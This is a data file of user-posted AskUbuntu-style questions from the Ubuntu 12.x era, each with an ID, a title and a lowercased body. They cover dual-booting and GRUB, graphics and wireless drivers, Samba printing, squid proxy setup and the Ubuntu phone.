235536	install ubuntu 12.10 issue	i 'm installing ubuntu 12.10 along side windows 7 . i have installed windows then ubuntu 12.10 , each on a different partition . while choosing where to install boot loader i left the default , it was my hard disk name in general not a specific sda or something like that . everything was fine and after rebooting again windows start up logo appeared . i tried to add ubuntu to windows boot list using easybcd and it returned success . now i can see it windows boot menu but after opting ubuntu a message and grub > prompt appears . i 'm totally confused , help please . thanks and happy new year . ; )
235539	xming alternative for ubuntu	i have a ubuntu machine that can be accessed remotely using putty . i run xming in the windows and enabled x11 forwarding in putty . so if i start wireshark in the putty , i get the display in my windows . if i need to do the same thing from ubuntu , what should be installed . that is . from one ubuntu pc i am doing ssh to the remote machine . what software should be installed so that i can see the ui ( if i start wireshark in the remote pc in the ssh ) . thanks & regards , js
235544	create application for ubuntu phone	i am android developer and want to start ubuntu phone development . i want to develop in java . please help me out to get started !
235552	input text at the cursor ( in any window )	i need to be able to input some text ( constant ) at the cursor of any window by pressing a defined shortcut ( i know this is specific to a window manager , so this is n't part of the question ) . i.e . i 'm making a comment on a site , want to add my signature , press a shortcut and the signature is pasted at the cursor . this must not be app-specific . suggestions appreciated .
235553	desktop broken : no launcher and no windows	today my laptop ( lenovo thinkpad t530 ) stopped booting at 'checking battery state ' or a similar message . loging-in to the regular console ( alt-ctrl-f1 ) was possible , and i figured maybe it is some messed up driver thing . so i reinstalled the nvidia-current drivers ( apt-get install -reinstall ) . this fixed the problem , however now after login in i see my desktop , but no launcher ! furthermore if i start an application ( ctrl-alt-t does work ) i can not move the application around ( i.e . there is no real window , just the application itself ) nor can i use atl-tab to switch applications . basicly i can not work anymore because it is impossible to switch applications ! i tried a million things ( unity-reset.py script , installing nvidia-experimental drivers , reinstalling the unity package ) , but nothing seems to fix this . edit : ok , so i have sort of a solution now : i uninstalled all nvidia drivers ( i remembered these cause problems in the past ) . however this brought back the problem that the gui wo n't boot beyond the test message 'checking battery state ' . choosing in the boot menu to boot an older kernel ( 3.5.0-19-generic instead of 3.5.0-21-generic ) solved that problem . so there are really two questions left though : why wo n't my system boot up properly all of a sudden ( without picking an older kernel ) ? why does the gui not work properly with the nvidia drivers ( afaik my laptop has an nvidia optimus graphics nvs 5400m videocard ) .
235555	intalled ubuntu 12.10 and now can not boot win 7	so this is my brothers pc and i finally convinced him to try out ubuntu and went about installing it ... he did have windows 7 and xp installed ( with 4 partitions , win7 , documents partition , win xp and another partition which called itself extended partition . so ubuntu installed and then when i rebooted on grub it first showed ubuntu or `` windows vista boot repair '' ( which was the original os when my bro got this , it came with a free upgrade to win 7 ) . i cclicked on the vista option and it said insert win recovery disk . i ran boot repair and all that did was remove the windows vista option to boot ... . here is the most recent boot repair pastebin http : //paste.ubuntu.com/1491459/ thanks for any help you can give
235556	how can i disable transmission-daemon autostart	i tried rcconf and update-rc.d but transmission-daemon starting each time i boot the system .
235557	how do i start an application on another desktop as default ?	i want to start certain applications like teamviewer from my startup application , but on a particular desktop everytime . is this possible using a parameter ?
235560	ubuntu one installation goes fail	after fresh installation of ubuntu 12.04.1 x64 , when i launched ubuntu one i got following error . when i tried to upgrade python-ubuntuone-control-panel , it shows that already newest version . i reinstalled ubuntu one but got same . error while installing using terminal kk @ kk : ~ $ sudo apt-get install ubuntuone-client reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntuone-client : depends : python-ubuntuone-client ( = 3.0.0-0ubuntu1 ) but 3.0.2-0ubuntu1 is to be installed recommends : ubuntu-sso-client-gui ( > = 2.99.91 ) e : unable to correct problems , you have held broken packages . kk @ kk : ~ $ but when i tries to kk @ kk : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . edit but when i see synaptic i have already installed libnautilus to 1:3.4.2 .
235561	desktop tearing kubuntu 12.04 with intel hd	experiencing nasty tearing on desktop , when moving windows around , scrolling browser , playing video with mplayer/vlc kubuntu 12.04.1 fully updated opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 8.0.4 opengl shading language version string : 1.30 _ sudo lshw -c video *-display description : vga compatible controller product : ivy bridge graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : f6400000-f67fffff memory : e0000000-efffffff ioport : f000 ( size=64 ) did n't notice any errors in xorg log display resolution is at 1600x900 ( auto ) , 60hz , same with different displays ( hdmi/vga ) compositing disabled/enabled ; compositing type : opengl , xrender ; vsync on/off no difference at all . please help .
235562	tripple booting with refit	i am currently working on a mac that is dual booting ubuntu 10.04 32-bit with mac os x ( lion i think ) 64-bit via refit ; i never use the os x partition because i ca n't stand the ui on macs , my question is , if i were to try installing ubuntu 12 64-bit onto this system , using another partition , would i use refit to have three options when the machine loads up , or would i just use the pre-existing ubuntu 10.04 grub boot loader . i was curious as to if this would cause any issues due to the 10.04 boot loader being either older or running at 32-bit when trying to install a 64-bit os . thanks .
235563	recovering shift-deleted files ?	i just shift-deleted some important pdf-files from my dual-boot system . the files were originally on windows drive , but i deleted them from ubuntu . i just used foremost to recover , but it returns more than 1000 files , with numbered-names . i can neither open the file , nor find my desired ! is there any way that i can recover my files using , say , their names , or the directory which have been deleted from ? thanks
235567	windows 8 removes grub as default boot manager	i have a sony vaio s series with windows 8 preinstalled , and i installed ubuntu 12.10 on a new partition . when the pc boots grub is display , and i can choose between windows 8 ( did n't worked at the beginning , had to change grub settings ) and ubuntu 12.10 . when i select ubuntu 12.10 everything is ok , but when i use windows 8 , and i restart grub is n't displayed anymore ( windows 8 boots immediately ) . i booted a ubuntu 12.10 liveusb , used efibootmgr , and found out that windows 8 ( each time it boots ) changes efi default bootloader from grub to windows boot manager . how do i change this in windows 8 ? i read something about bcdedit , but it does not work or i do n't know how to use it ...
235570	how to install every 32 bit library on 64 bit ubuntu ?	i bought a new laptop this christmas and installed ubuntu 12.04 64 bit edition on it . i downloaded steam and bought trine 2 , but i ca n't get it to work . i installed ia32-libs , but still nothing . is there a chance to install every 32 bit libraries on my laptop ?
235571	sky/fog/lighting problems during gameplay gta san andreas on ubuntu quantal and intel mobile 4 series	during the gameplay , while outside , i get problems in the rendering of what i guess would be lighting and/or weather effects . even with effects level to `` low '' . the scenery is rendered properly , no texture missing , but is overlapped by single color polygons . with effects level higher than `` low '' , those rendering problems get worse , the sky is not rendered at all , with varying colors and contours of the scenery leaving traces in the sky . i am a newbie and i 've been not able to get screenshots to post . i 'd appreciate if you could please help me , also in extracting the information needed from you in order to debug the problem . i could n't find any further information about other lnux distributions in the internet .
235578	any chance of a tablet version ?	i have a hannspree hanspad tablet* . decent hardware but awful software ( based on android 2.2 but stripped of much functionality ) . i would love to get ubuntu on it . are there plans to roll out the smartphone software to tablets ? http : //www.hannspree.com/global/product/tabletpc/hannspad/sn10t1/
235579	when theme changed run a certain command ?	the command i want the system to run when the user changes the current theme is : wallch -- changetheme how can i accomplish that ?
235583	black screen after starting ubuntu	have installed ubuntu 12.10 on laptop packardbell easynote tk processor intel celeron t3500 screen 15.6 '' 16:9 hd led lcd thanks in advance for your advice !
235584	how can i install ubuntu on galaxy nexus	how can i install ubuntu system in my android phone galaxy nexus ?
235593	can i dual-boot in virtualbox ?	i use windows 7 . i also run ubuntu 12.04 in virtualbox . the other day i wanted to try lubuntu . is there a way to dual-boot ubuntu 12.04 and lubuntu in virtualbox ?
235594	can not create file on nas	i have a new western digital my book live 3tb nas drive and i need to mount it on my ubunto 12.10 laptop . i have created a directory '/nasrichardsworklaptop ' ( changed its ownership and group to myself , and given it 777 access ) and mounted the nas drive onto that using the following line in fstab : //10.0.0.14/richardsworklaptop /nasrichardsworklaptop cifs defaults 0 0 however , as soon as it mounts '/nasrichardsworklaptop ' becomes owned by root with 755 permissions and then only root can write to it . i need it to be read write to other users not just root . any idea who i can make that happen ? i tried sudo chmod 777 /nasrichardsworklaptop/ but the permissions remain at 755 even after this command ( if its mounted ) , so i 'm stuck !
235595	hi , getting a no entry sign at the top of the desktop	hi im getting the following message , the error message was : ror in sitecustomize ; set pythonverbose for trackbase : eoferror : eof read where not expected 4 ; 1 this usually means the installed packaged have unmet dependencies please help thanks
235596	is 64 bit ubuntu ( 120.04.1 lts ) running on virtualbox hosted by windows 8 safe ?	i recently got a pre-installed windows 8 system . i wish to dual boot it with ubuntu 12.04.1 lts but after reading the thread , i 'm doubtful of the idea . i can do the stated procedure but i do n't want to spoil the pre-installed windows 8 , i am scared that i might accidentally harm my system . now , what i really meant to ask is if running ubuntu on virtualbox is a good idea ? the system is 4 gigs ram , and an entry level core i5 processor . would the virtual machine be too taxing on my system ? i only wish to code on ubuntu , as it is much easier to do so on ubuntu than windows , nothing too heavy , just basic problem solving . i know i can code on windows 8 as well but i like nix-like system , and also the gedit . however , if virtualization does n't work , i am willing to dual boot ubuntu . i am thinking about allocating something like 512 mb ram to ubuntu and 20 gigs of hdd , as windows 8 alone without much heavy processes takes up 1.5 gigs .
235598	how to get rid of gitolite-shell ?	even though the login shell of user 'git ' is /bin/bash , when i try to ssh to the machine i get the following error : pty allocation request failed on channel 0 bash : /home/git/bin/gitolite-shell : no such file or directory connection to 192.168.20.151 closed . i do 'deluser git ' , then 'adduser git -- shell=/bin/bash ' , but it does not work . i change it again with 'chsh ' , still does not work . where is this '/home/git/bin/gitolite-shell ' stored ?
235605	xubuntu 12.10 amd catalyst 12.11 beta 11 installation not working , how to recover default driver settings	i 'm using a xubuntu / windows 8 dual boot setup . my initial problem was that when running xubuntu , my laptop ( a rather new dell inspiron 5520 , amd 7670/intel hd4000 hybrid ) got very hot over time . i read a couple of articles relating to this issue and decided to install the amd catalyst driver in hopes of having better control over my hybrid gpu . after installing the latest amd catalyst 12.11 driver ( beta 11 ) , i can not log in anymore when i enter my password the screen shortly turns black and then i am back at the login window . using the guest account i have no problems on login . checking the system settings revealed that the driver was installed , but when starting the catalyst control center a message pops up telling me that something with the installation went wrong . i 've read a lot here on askubuntu about getting rid of the driver , e.g . by running sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* i 've tried proposed solutions but even without the amd driver being installed i am not able to log in . how can i completely get rid of the driver ( i have the feeling there are maybe some driver remnants making trouble ) ?
235606	how to have internet acess by wifi in ubuntu 12.10 ( fujitsu lh 532 ) ?	i am a newcomer on ubuntu and i have just installed ubuntu 12.10 but i can not turn on wifi to have internet access.what can i do to let wifi works ? sorry for my bad english .
235609	how can i keep terminal always on top of other windows ?	i want to keep gnome-terminal application on top of all the applications , even when it is unfocused . how can i do so ?
235613	what is the best practice for saving data in ubuntu one db from mobile ?	i 'm doing a simple todo-list with qml for ubuntu phone os . is there any standard way for accessing ubuntu one database to sync data ?
235614	how can i find all packages that depends on another ?	i want to find all the packages in the ubuntu repository that depends on one particular package . in this case i want that dependency to be libqt4-dev , so i can find all the packages developed with qt . i know i need to use apt-cache , but i 'm not sure what the arguments should be .
235626	ca n't get dual boot to work with windows 7	i have tried numerous options but all do not seem to work . the problem is this : the standard ubuntu installer does not recognize my windows installation . when i manually create partitions , grub simply does not start and my pc boots directly into windows . this is the output of gdisk ( i read in a couple of posts this could be the problem ) : gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sda : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 11d43dde-1b52-db45-929b-98f1eda2f5c4 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 2048-sector boundaries total free space is 267629 sectors ( 130.7 mib ) number start ( sector ) end ( sector ) size code name 1 2048 206847 100.0 mib ef00 2 468992 978870271 466.5 gib 0700 3 978870272 1953521663 464.8 gib 0700 basic data partition
235628	wireless drivers stopped working on a laptop with ubuntu 12.10	everything worked fine on my laptop with fresh ubuntu 12.10 x64 , until wireless just stopped working at some moment . hardware switch has no effect . sudo lshw -c network : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c3500000-c3503fff there 's also no wlan device in ifconfig , while on ubuntu live usb wi-fi is working ok and there 's wlan0 device . according to troubleshooting doc unclaimed means i do n't have drivers . what can be done to fix this ? can it be resolved by copying some driver files from live usb system ? edit . also , wireless is for some reason hard blocked : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes edit . i solved the problem . the instructions in how to install broadcom / sta wireless card ( bcm43xx ) question did it , but with slight modification : instead of installing firmware-b43-installer , firmware-b43-lpphy-installer helped . there 's only one glitch left : my wireless toggle button has a two-color light in it ( red for turned off , white for turned on ) , and this light does n't change .
235630	touchpad cursor inertia	when using my synaptics touchpad on windows , the driver has the option of giving the cursor inertia ( note , not just the scrolling ) . i found it a lot less straining to use the touchpad with this feature enabled . you could 'fling ' your finger in a direction and zoom across the screen quickly instead of 'treading through mud ' to get there . so is there any way of getting cursor inertia on ubuntu 12.04 ?
235632	windows printer via samba - browse not available	recently installed kubuntu 12.10 on a dell xps system . overall happy , but i can not access my windows printers . samba is correctly installed and works for browsing and accessing windows directories on the mshome workgroup . when trying to add my existing ( and working ) printers to kubuntu , i select the `` windows printer via samba '' option and the `` browse '' box on the right is not available ( gray ) . when entering the printer name directly , as soon as i have entered `` smb : //mshome/x '' , `` x '' being just about anything , the `` next '' button at the bottom is available and enables me to select a printer . which of course will not work ! ( no correct windows server or printer is selected ) . i tried just about all options , including providing proper authentication data but nothing seems to enable the `` browse '' box to become active . sounds to me like a bug in the add printer feature , no ? note : entering the exact path to the printer enables to select , enable and print , but it may not be easy in a larger network environment . thanks , -patrick
235633	billing and music store delivery problems in ubuntu one	i 've been having a number of problems with ubuntu one and neither canonical nor 7digital have been able to help . firstly , months ago i placed an order and was charged double the actual price , $ 2 for each song . secondly , i ordered songs last night , about 12 hours ago , and they are still pending delivery despite the claim that purchased songs `` are magically delivered to your ubuntu one cloud in an instant . '' does anyone know who else i could get in touch with ? i want to support ubuntu by purchasing my music from its store , but i ca n't continue to do so until this is resolved .
235637	how can i correctly align widgets on glade ?	i have to make three combo boxes become aligned with each other , on the right of my application , which will contain pre-defined responses to questions asked with labels on the left . however , i can not imagine a way to do this with glade , since it insists on placing all the widgets next to each other . how can i properly align these widgets ? edit : here 's an application mockup : and here 's what i have with glade : my intent is to make the ui in glade at least similar to mockup ui . edit ( 2 ) : there 's the app widget tree :
235642	play on linux is broken for ubuntu 12.10 ( 64bit )	i have read a few threads about how to get play on linux to run . but the only solution seems to be to reinstall to 32-bit . do anyone here know about if there are a workaround without having to reinstall to a 32-bit version ? thanks in advance roland
235643	disabled opengl and when i reenabled it , i could n't reactivate features	through to a test on gaming performance i disabled opengl and all of its features and lost me multi workspaces ( i had 4 ) i reactivated it , rebooted my pc and still do n't get all its features back . ( still have 1 workspace ) how can i change it back the way it was ? i saw when disabling it that i turn off a lot of features so i would like to know if it is possible to reactivate all of them ... i use ubuntu 12.04 i386 and run the on gnome classic .
235644	how to get intel corporation centrino wireless-n 1000 working ?	initially wireless did not work - it would find wireless and would start connecting , but it would just keep prompting for the password and never connected . i found this proposed fix on linuxmint.com which installs an older version of the microcode ( firmware ) for my device . that seems to have disabled any wireless capability . rfkill list all shows nothing and there is no wireless option in my 'taskbar ' . i 'm a linux newbie so bear with me , and let me know if i can add any command outputs that might help you help me resolve this issue ! : ) sudo lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 3 [ 8086:1c14 ] ( rev b4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf106 [ geforce gtx 460m ] [ 10de:0dd1 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf106 high definition audio controller [ 10de:0be9 ] ( rev a1 ) 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0083 ] 04:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 03 ) /var/log/udev output . /var/log/dmesg output .
235646	how can i show special characters in a terminal when i copy a file from my local mac to my remote ubuntu server ?	when i copy a webpage from my local machine ( mac ) to my remote server ( ubuntu ) , the special characters in the text are ending up in squares in a browser or question-mark-symbols in the terminal . i tried copying them with scp or ftp ; same problem . i checked the language on the server : lang=en_us.utf-8 . this seems right and should n't be the problem anyway because when i edit the file in the terminal on the server , special characters display as they should . already searched for hours but ca n't find the solution . anyone an idea ?
235647	how can i get wireless to work on a dell latitude d610 ?	i can not log into my wifi on my dell latitude . i have to hard wire it to my other laptop to get on the internet . does anyone have any idea about how to get the wifi to work ? john @ john-latitude-d610 : ~ $ rfkill list all john @ john-latitude-d610 : ~ $ lsmod module size used by snd_seq_dummy 12686 0 bnep 17707 2 rfcomm 37276 0 bluetooth 183228 10 bnep , rfcomm b43 347284 0 snd_intel8x0 33106 2 snd_ac97_codec 105616 1 snd_intel8x0 radeon 820734 3 joydev 17161 0 ac97_bus 12670 1 snd_ac97_codec snd_pcm 80163 2 snd_intel8x0 , snd_ac97_codec mac80211 461161 1 b43 snd_seq_midi 13132 0 ttm 75534 1 radeon snd_rawmidi 25382 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51255 3 snd_seq_dummy , snd_seq_midi , snd_seq_midi_event drm_kms_helper 47303 1 radeon drm 238768 5 radeon , ttm , drm_kms_helper cfg80211 175375 2 b43 , mac80211 snd_timer 24411 2 snd_pcm , snd_seq snd_seq_device 14137 4 snd_seq_dummy , snd_seq_midi , snd_rawmidi , snd_seq snd 61991 11 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device gpio_ich 13159 0 dell_laptop 17161 0 pcmcia 39509 0 soundcore 14599 1 snd psmouse 84843 0 i2c_algo_bit 13197 1 radeon bcma 34483 1 b43 snd_page_alloc 14036 2 snd_intel8x0 , snd_pcm microcode 18209 0 serio_raw 13031 0 dcdbas 14054 1 dell_laptop lpc_ich 16925 0 yenta_socket 27095 0 pcmcia_rsrc 18191 1 yenta_socket ppdev 12817 0 mac_hid 13037 0 pcmcia_core 21505 3 pcmcia , yenta_socket , pcmcia_rsrc parport_pc 31968 1 video 18847 0 lp 13299 0 parport 40753 3 ppdev , parport_pc , lp ssb 50087 1 b43 tg3 130448 0
235649	will ubuntu phone os be entirely open source ?	if so , how could mobile carriers like at & t lock the phone to work only with their sim ? thanks !
235650	windows 8 and ubuntu 12.10 dual boot problem	i 'm usually using linux but since i had to use windows at my office , i was stuck with a windows 8 pc for a while . after a while i could n't stand it any more and wanted to dual boot with seemingly easier way . i installed windows 8 first and left a 150gb free space at the end of the disk without formatting it . i boot my ubuntu 12.10 liveusb and created /boot /swap / and /home with gparted . while i tried to install ubuntu gave me a warning that i needed to have an uefi sector too so i created /efi too . i chose /boot to install boot sector . after i restarted only ubuntu boots . there is no sign of windows 8 . windows dvd ( bootrec.exe ) can not find any existing windows on my disks . boot repair ( ubuntu ) does n't show any `` restore mbr '' option nor it is able to find any existing installation of other systems . this is my output from boot repair : http : //paste.ubuntu.com/1491833/
235655	node.js conflicts : /sbin/node vs /usr/bin/node	i have two ubuntu 12.10 machines : machine a is a vmware vm and machine b is and old acer laptop . on both machines , i installed node using apt-get . however machine a installs the main binary as /usr/bin/node and machine b as /usr/bin/nodejs . here are some behaviors i observed : both machine returns /usr/bin/node in response to the which node command . however , there is no such file on machine b . issuing the command node works for machine a , not b . on b , i have to use nodejs instead . on b , there is a binary called /sbin/node , a does not have it . these behaviors causes inconsistency problem when developing on both machines . for now , i worked around by renaming the binaries on b as such : sudo mv /sbin/node /sbin/node-sbin sudo ln -s /usr/bin/nodejs /usr/bin/node is there a way to really fix this , so that node will be installed as /usr/bin/node instead of /usr/bin/nodejs ?
235656	will there be a way to install `` ubuntu for phones '' on apple mobile devices ?	is there any plans to make ubuntu phone os run on jailbroken ipads , iphones , and ipods ? i know someone managed to get xubuntu running on an ipod touch once so i was wondering if ubuntu 's phone os will run on idevices .
235658	application for finding song names	i 'd like to know if anyone knows an application or knows of one being developed that can do what i 've stated in the question . on mobile devices there 's an app called shazam : is there an equivalent for this on the ubuntu desktop ? it 'd be really useful as i 've several times heard songs online or on tv with no lyrics ( so i ca n't just google them ) and i 'm left with no idea as to what the name of the music track could be even though they 're catchy tunes . to explain in a clearer way : i 'm looking for an application that `` listens '' to the song playing on your pc for a few seconds and gives you the name of the song using an internet database . if there 's a plugin which does this in a media player such as banshee , rhythmbox or any other which works on ubuntu , feel free to point it out as well .
235659	how to change the colour xfce panel windowlist buttons flash	i 'm using xubuntu 12.04 . i have a panel at the top of my screen , with a `` window buttons '' item on it that shows the list of open windows ( panel-tasklist-menu ) . i 'm using a dark theme , and when the buttons `` flash '' to notify me they want attention , the colour is barely noticeable - i 'd like it to flash to a more obvious/contrasting colour . i can change themes to get this effect , but i really like everything else about the theme i 'm using . i 've tried looking for information about how to override the colour , but there does n't seem to be a setting for it - other themes use other colours - so it must be possible . does anyone know how i can change the colour it flashes to ?
235660	how do i change the default file manager back to nautilus ?	a while back , i set my default file manager to nemo . i like it a lot , but it constantly crashes . i remember editing a text file to set it as default , but i forgot which file it was . how do i switch back to the nautilus file manager ?
235662	fan control on asus eeebox 1033	i 'm using an asus eeebox 1033 , which is intended as a htpc , and thus needs to be quite . i 've tried to use lm-config and fancontrol packages . when i check for sensors , all i see is two temperature ( cpu and gpu ? ) , but nothing else . xbmc @ xbmc-eb1033 : /etc $ sensors coretemp-isa-0000 adapter : isa adapter core 0 : +37.0째c ( crit = +100.0째c ) core 1 : +32.0째c ( crit = +100.0째c ) and if i try to use pwmconfig , all i get is the following message : xbmc @ xbmc-eb1033 : /etc $ sudo pwmconfig # pwmconfig revision 5857 ( 2010-08-22 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed furthermore , i 've tried to follow the posts here : http : //ubuntuforums.org/showthread.php ? t=42737 but got stuck , since the pwmconfig-file does not look like anything i have on my computer . i 'm using a fresh install of ubuntu 12.10
235664	how can i change the keyboard shortcuts in nano ?	to indent a whole block of code in nano , after selecting it with alt+a , i have to press alt+ { , which does n't work on my german layout macintosh keyboard ( and would be pretty annoying even if it did ) . how do i change and customize nano 's keyboard shortcuts ?
235665	where can i get a device with 'ubuntu for phones ' pre-installed ?	canonical has recently announced ubuntu for phones , which is ubuntu with a specific interface for mobile devices . where can i get phones with this version of ubuntu pre-installed ? if no devices are available yet , where can i pre-order one ?
235667	squid + iptables not working	i would like to make a proxy on my ubuntu vm for testing a php script that must use proxy . i installed squid and made some things with iptables command . i wrote : sudo iptables -a output -p tcp -- dport 80 -j drop then i edited my squid.conf file : acl all src all acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 # acl localnet src 192.168.152.132/24 # this is my ip address # acl ssl_ports port 443 # https acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect http_access allow manager localhost http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost http_access allow localnet http_access deny all http_port 3128 transparent visible_hostname myproxy coredump_dir /var/spool/squid3 refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 refresh_pattern ( release|packages ( .gz ) * ) $ 0 20 % 2880 refresh_pattern . 0 20 % 4320 so every port 80 request are now blocked and in firefox when i 'm editing my proxy settings i would like to pass through taht proxy . i wrote my ip address with squid 's port but i still have an access denied . do you know what i 'm doing wrong ? thanks !
235672	for installing directadmin , is ubnutu server needed ?	i have ubuntu 12.10 , and it is not a ubuntu server version . for installing directadmin , do i need ubuntu server or i can install it on my own ubuntu ?
235678	are there secret banshee rewind and fast forward controls ?	i do a lot of listening to songs i need to learn , which means i often want to rewind or fast forward a few seconds . instinctively i want to use my arrow keys . is there a plugin for banshee that can help with that or some controls that i 'm just not seeing ? i can move the scrubber with my trackpad , but it is n't very precise . i 'd rather use keystrokes .
235682	ubuntu 12.04. display stuck on 640x480	good day . i have a problem . i have been running ubuntu 12.04 on my asus n76v . with nvidia geforce gt 650m 2gb graphics card for two weeks . yesterday while trying to get my accelerated graphics to work i installed the experimental drivers 310 from synaptic . after which my display went from 1280x whatever it is , to 640x480 . i followed desktop does not show when i installed nvidia drivers ! . and can not install nvidia drivers . and ubuntu 12.04 nvidia drivers . to no avail . then i did a fresh install . it worked until i did the updates . after the updates it went back to 640x480 . not sure if i am missing something , or just screwed , i just know it worked for two weeks with no problems and now i cant fix the resolution .
235684	turning off screensaver in unity after installing xubuntu-desktop 12.10	i 'm on ubuntu 12.10 . i installed the xubuntu-desktop package to see if i would like it and determined i would prefer to keep using unity . ever since i did that i 've been running into certain issues when using unity . i never had a screensaver before , but now there is one and i ca n't seem to turn it off or configure it from the settings menu . coming back from the screen saver also results in a compiz error message sometimes . i also have a new update notification icon as mentioned in this related question . how do i turn off the screensaver ? i 'd like to remove the package completely if i could .
235685	a way to install nulled directadmin on ubuntu 12.10 ?	is there any way to install a nulled directadmin on ubuntu 12.10 ? i want to learn how to use the directadmin before i buy it , so i thought of installing a nulled directadmin first . anyone know if it is possible to install it and if so , then how to install it ?
235691	ubuntu phone emulator and developer phone release date	will they release an emulator on which apps can be tested ? if yes , which ide will they choose ? ( eclipse , qt creator , mono , all of them ? ) also is there any way to get an ubuntu phone for developing purposes ? i 'd buy one for developing apps on it even if it does not run as slick as expected but i would n't buy an android phone just to install ubuntu afterwords . thank you !
235696	will grub be upgraded if i upgrade my system to a newer release ?	i have a system with ubuntu 11.10 and grub classic installed . does an upgrade to the most recent version of ubuntu also updates my grub to grub2 ?
235700	linking error when trying to compile on a shared drive	i am trying to compile opencv library on a shared drive on my system . i was able to configure and generate makefiles successfully by using these settings , but when i try to compile i get the following error : linking cxx shared library ../../lib/libopencv_core.so cmake error : cmake_symlink_library : system error : operation not permitted cmake error : cmake_symlink_library : system error : operation not permitted make [ 2 ] : *** [ lib/libopencv_core.so.2.4.3 ] error 1 make [ 1 ] : *** [ modules/core/cmakefiles/opencv_core.dir/all ] error 2 make : *** [ all ] error 2 please help to resolve . i think it may be an issue with the mount flags .
235707	system restore for new users ?	i am a computer repair technician , with the release of win 8 my clients are uncomfortable with the new user interface . i have been introducing some of them to ubuntu ( 12.04 ) . the one thing missing is system restore like in windows 7 . i understand that there is a recovery option in grub , but i need something extremely easy for new users to use . i found this : http : //sourceforge.net/projects/system-restore/ but it has n't seen any updates since 2009 . any input would be helpful .
235710	shortcuts lost after restart	i 'm using ubuntu 12.10 . when i try setting some shortcuts and restart the system they are `` deactivated '' or default ( but they are still working ) . after one more restart they do not work any more . can you tell me how to handle this problem , please ? thanks a lot !
